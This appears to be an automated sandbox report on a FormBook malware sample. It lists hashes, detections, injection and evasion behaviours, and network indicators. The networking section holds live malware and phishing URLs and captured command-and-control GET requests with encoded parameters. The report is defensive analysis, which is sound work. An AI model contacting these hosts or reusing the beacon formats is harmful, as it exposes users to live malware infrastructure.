Windows Analysis Report
H4vBtZsi8xAKaMm.exe

Overview

General Information

Sample Name: H4vBtZsi8xAKaMm.exe
Analysis ID: 562156
MD5: 7eabab04e4a6fdd45238e32ed81e222c
SHA1: e0e1dc469746f5e2e049ea4a93d9b09a9227b342
SHA256: b79d2d02fe777cfd64723ad9b3935b30c00cbc75614fcadbf867cce88df4a8fd
Tags: exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
Sigma detected: Suspicious Rundll32 Without Any CommandLine Params
Uses 32bit PE files
Found decision node followed by non-executed suspicious APIs
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: H4vBtZsi8xAKaMm.exe Virustotal: Detection: 65% Perma Link
Source: H4vBtZsi8xAKaMm.exe Metadefender: Detection: 47% Perma Link
Source: H4vBtZsi8xAKaMm.exe ReversingLabs: Detection: 85%
Yara detected FormBook
Source: Yara match File source: 14.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.MSBuild.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.401541679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.401760345.0000000000E90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.337332545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.388085827.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.341894458.00000000042D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.337090628.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.798933508.00000000010C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.402488098.0000000001200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.799622406.00000000046D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000000.375017182.000000000EBE6000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.790726113.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.freeclothesonline.com/u1p5/ Avira URL Cloud: Label: malware
Source: http://www.freeclothesonline.com/u1p5/www.apeutah.com Avira URL Cloud: Label: malware
Source: http://www.pbcgotv.com/u1p5/ Avira URL Cloud: Label: malware
Source: http://www.apeutah.com/u1p5/www.jovam.xyz Avira URL Cloud: Label: malware
Source: http://www.pbcgotv.com/u1p5/www.kailibianminwang.com Avira URL Cloud: Label: malware
Source: http://www.hokabrazil.com/u1p5/www.hornnbach.com Avira URL Cloud: Label: phishing
Source: http://www.jovam.xyz/u1p5/www.hokabrazil.com Avira URL Cloud: Label: phishing
Source: http://www.vinewineltd.com/u1p5/www.pbcgotv.com Avira URL Cloud: Label: malware
Source: http://www.agengrosirfashion.com/u1p5/ Avira URL Cloud: Label: malware
Source: http://www.jovam.xyz/u1p5/ Avira URL Cloud: Label: phishing
Source: http://www.kailibianminwang.com/u1p5/ Avira URL Cloud: Label: malware
Source: http://www.agengrosirfashion.com/u1p5/www.dasmonica.com Avira URL Cloud: Label: malware
Source: http://www.apeutah.com/u1p5/ Avira URL Cloud: Label: malware
Source: http://www.hokabrazil.com/u1p5/ Avira URL Cloud: Label: phishing
Source: http://www.hokabrazil.com Avira URL Cloud: Label: phishing
Source: http://www.vinewineltd.com/u1p5/ Avira URL Cloud: Label: malware
Source: http://www.kailibianminwang.com/u1p5/. Avira URL Cloud: Label: malware
Machine Learning detection for sample
Source: H4vBtZsi8xAKaMm.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 14.0.MSBuild.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.MSBuild.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.0.MSBuild.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 14.2.MSBuild.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance
barindex
Uses 32bit PE files
Source: H4vBtZsi8xAKaMm.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: H4vBtZsi8xAKaMm.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\jpRHjxHGRl\src\obj\Debug\760pQ.pdb source: H4vBtZsi8xAKaMm.exe
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 0000000E.00000002.401789434.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000003.338982256.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.401925029.0000000000FEF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.800187501.0000000004B1F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.799896535.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.402164809.00000000046D0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 0000000E.00000002.401789434.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000003.338982256.0000000000D30000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000E.00000002.401925029.0000000000FEF000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 00000013.00000002.800187501.0000000004B1F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.799896535.0000000004A00000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.402164809.00000000046D0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: rundll32.pdb source: MSBuild.exe, 0000000E.00000002.402970903.0000000002B70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: rundll32.pdbGCTL source: MSBuild.exe, 0000000E.00000002.402970903.0000000002B70000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: rundll32.exe, 00000013.00000002.800904325.0000000004F2F000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000001E.00000000.495181429.000000000315F000.00000004.80000000.00040000.00000000.sdmp

Software Vulnerabilities
barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then pop edi 14_2_00417D2F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4x nop then pop edi 19_2_00AB7D2F

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 92.222.235.170 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.vzn2aai2qj.icu
Source: C:\Windows\explorer.exe Domain query: www.shitcoin.team
Source: C:\Windows\explorer.exe Network Connect: 192.0.78.24 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.deutscheno1.com
Source: C:\Windows\explorer.exe Domain query: www.bettingweb365.com
Source: C:\Windows\explorer.exe Network Connect: 107.180.34.104 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.marymarinho.com
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /u1p5/?y4Mp=vL5j7Eq3si3+pqkwq9GVQc9zWaxA/P/bTusMaerk9f3EW+lc0CCc1NhXRSl0Kt4KYFMx8zSAYw==&D0GHx=5jNT HTTP/1.1Host: www.shitcoin.teamConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u1p5/?y4Mp=jmW97e0DcxHZsiDt+DmiFhziWrO1jPfkTbEIn6OHXnuLtYKLIrDwNEu/EQYt2xDuBHghXZP9DQ==&D0GHx=5jNT HTTP/1.1Host: www.marymarinho.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvD+HvWaQ2ttROIxFaz7G4unDmw6qRWL3K2g==&D0GHx=5jNT HTTP/1.1Host: www.bettingweb365.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Fri, 28 Jan 2022 14:18:48 GMTConnection: closeContent-Length: 1118Data Raw: 3c 48 54 4d 4c 3e 0d 0a 3c 48 45 41 44 3e 0d 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 42 41 53 45 20 68 72 65 66 3d 22 2f 65 72 72 6f 72 5f 64 6f 63 73 2f 22 3e 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 3c 2f 42 41 53 45 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 0d 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0d 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0d 0a 3c 50 3e 0d 0a 3c 48 52 3e 0d 0a 3c 41 44 44 52 45 53 53 3e 0d 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 26 23 31 31 35 3b 26 23 31 30 34 3b 26 23 31 30 35 3b 26 23 31 31 36 3b 26 23 39 39 3b 26 23 31 31 31 3b 26 23 31 30 35 3b 26 23 31 31 30 3b 26 23 34 36 3b 26 23 31 31 36 3b 26 23 31 30 31 3b 26 23 39 37 3b 26 23 31 30 39 3b 0d 0a 3c 2f 41 44 44 52 45 53 53 3e 0d 0a 3c 2f 42 4f 44 59 3e 0d 0a 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 3c 21 2d 2d 0d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0d 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0d 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0d 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0d 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0d 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0d 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0d 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0d 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 74 68 61 74 20 61 72 65 20 6c 6f 6e 67 0d 0a 20 20 20 2d 20 65 6e 6f 75 67 68 20 74 6f 20 6d 61 6b 65 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 68 61 70 70 79 2e 20 54 68 65 0d 0a 20 20 20 2d 20 77 6f 72 6b 61 72 6f 75 6e 64 20 69 73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.108.210
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: unknown TCP traffic detected without corresponding DNS query: 93.184.220.29
Source: rundll32.exe, 00000013.00000002.801147155.000000000541F000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://bettingweb365.com/u1p5/?y4Mp=UXBCCV9Hg7LlUlEhFgBZZuvhtrkgDnenbWAOO9JvD
Source: explorer.exe, 0000001E.00000003.567450679.000000000AB41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.554536830.000000000AB41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.564216123.000000000AB41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605703155.000000000A889000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.560927966.000000000AB41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.564612786.000000000AB41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.560220229.000000000AB48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.555403231.000000000AB41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.606908634.000000000AB41000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000001E.00000003.568649594.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.565231882.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.567907070.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.340630386.00000000032D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.agengrosirfashion.com
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.agengrosirfashion.com/u1p5/
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.agengrosirfashion.com/u1p5/www.dasmonica.com
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.agengrosirfashion.comReferer:
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apeutah.com
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apeutah.com/u1p5/
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apeutah.com/u1p5/www.jovam.xyz
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apeutah.comReferer:
Source: explorer.exe, 0000000F.00000000.363498621.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.434119185.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.348701953.0000000006840000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.382832125.0000000006840000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.dasmonica.com
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.dasmonica.com/u1p5/
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.dasmonica.com/u1p5/www.freeclothesonline.com
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.dasmonica.comReferer:
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.deutscheno1.com
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.deutscheno1.com/u1p5/
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.deutscheno1.com/u1p5/www.yannickrast.com
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.deutscheno1.comReferer:
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.340265098.0000000001987000.00000004.00000020.00020000.00000000.sdmp, H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.344172860.00000000074A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.340265098.0000000001987000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comF
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.340265098.0000000001987000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comm
